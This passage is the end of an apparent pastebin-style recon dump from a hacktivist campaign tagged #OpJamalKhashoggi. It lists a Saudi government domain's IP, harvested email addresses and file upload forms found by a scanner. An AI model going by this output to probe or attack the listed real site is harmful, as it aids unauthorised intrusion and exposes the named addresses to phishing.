  2435. + End Time: 2018-10-21 14:38:02 (GMT-4) (1133 seconds)
  2436. ---------------------------------------------------------------------------------------------------------------------------------------
  2437. #######################################################################################################################################
  2438. =======================================================================================================================================
  2439. | Domain: http://gip.gov.sa/
  2440. | IP: 212.138.117.71
  2441. =======================================================================================================================================
  2442. #######################################################################################################################################
  2443. | E-mails:
  2444. | [+] E-mail Found: info@gip.gov.sa
  2445. | [+] E-mail Found: help@gip.gov.sa
  2446. |
  2447. | FCKeditor File Upload:
  2448. |
  2449. | File Upload Forms:
  2450. | [+] Upload Form Found: http://gip.gov.sa/Home/
  2451. | [+] Upload Form Found: http://gip.gov.sa/
  2452. | [+] Upload Form Found: http://gip.gov.sa/Home/Page/
  2453. ####################################################################################################################################### Anonymous JTSEC #OpJamalKhashoggi Full Recon #1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement